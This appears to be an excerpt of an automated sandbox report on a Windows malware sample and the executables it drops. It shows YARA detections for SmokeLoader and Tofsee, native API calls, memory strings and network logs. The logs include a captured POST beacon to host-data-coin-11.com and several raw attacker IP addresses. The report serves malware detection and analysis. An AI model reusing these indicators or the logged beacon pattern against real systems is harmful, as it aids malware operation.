0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: svchost.exe, 00000014.00000003.395022621.0000024EC8388000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000014.00000003.395022621.0000024EC8388000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000014.00000003.394971409.0000024EC8399000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.395022621.0000024EC8388000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-12-15T12:35:18.6138891Z||.||e217b6c4-7952-49aa-94f4-7f08eae9e9cb||1152921505694292641||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000014.00000003.394971409.0000024EC8399000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.395022621.0000024EC8388000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-12-15T12:35:18.6138891Z||.||e217b6c4-7952-49aa-94f4-7f08eae9e9cb||1152921505694292641||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: 5m9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                      Source: 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkkeh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: host-data-coin-11.com
                      Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49799 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.3:49830 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.15:443 -> 192.168.2.3:49831 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49833 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.41.11:443 -> 192.168.2.3:49835 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 164.132.207.80:443 -> 192.168.2.3:49836 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 2.1.3YzgU3S0nW.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.3YzgU3S0nW.exe.8715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.1.7085.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.ahtdegs.8715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.1.ahtdegs.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.7085.exe.7915a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.3YzgU3S0nW.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.3YzgU3S0nW.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.7085.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.ahtdegs.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.3YzgU3S0nW.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.3YzgU3S0nW.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.333615016.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.333559627.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.387454153.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.322063888.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.387405814.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                      Source: ahtdegs, 0000000F.00000002.376079425.000000000092A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 23.2.8A8A.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.3.8A8A.exe.880000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.8A8A.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.8A8A.exe.860e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000017.00000002.444369187.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.444506788.0000000000860000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.406594617.0000000000880000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 8A8A.exe PID: 5776, type: MEMORYSTR

                      System Summary:

                      barindex
                      PE file has a writeable .text sectionShow sources
                      Source: FFBD.exe.11.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_2_00402A5F
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_2_00402AB3
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_1_00402A5F
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_1_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 16_2_00793253
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 16_2_007931FF
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_2_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_1_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_1_00402AB3
                      Source: C:\Users\user\AppData\Roaming\ahtdegsCode function: 18_2_00402A5F
                      Source: C:\Users\user\AppData\Roaming\ahtdegsCode function: 18_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00410800
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00411280
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_004103F0
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_004109F0
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_00B59720
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_00B50470
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_00B50462
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_049D1428
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_049D4538
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_049DA618
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_049D07B8
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_049D8EA0
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_049DAF50
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_049D5938
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_049DBAA8
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_049D2BA8
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_049D6598
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_049D8F38
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_04AC1410
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_04AC5188
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_04AC0040
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_04AC2A48
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_04AF00F1
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 43_2_0302EC28
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: 3YzgU3S0nW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3YzgU3S0nW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F338.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F338.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FFBD.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 175C.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 175C.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 175C.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 7085.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 7085.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 8132.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 8132.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 8A8A.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 8A8A.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ahtdegs.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ahtdegs.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: atingifo.exe.23.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: atingifo.exe.23.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeSection loaded: mscorjit.dll
                      Source: sqlite3[1].dll.22.drStatic PE information: Number of sections : 19 > 10
                      Source: sqlite3.dll.22.drStatic PE information: Number of sections : 19 > 10
                      Source: 3YzgU3S0nW.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\tfktmtml\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: String function: 004048D0 appears 460 times
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: String function: 0040EE2A appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: String function: 00402544 appears 53 times
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: String function: 0042B510 appears 31 times
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: String function: 004276F0 appears 124 times
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: String function: 00428660 appears 82 times
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_2_00402491 NtOpenKey,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
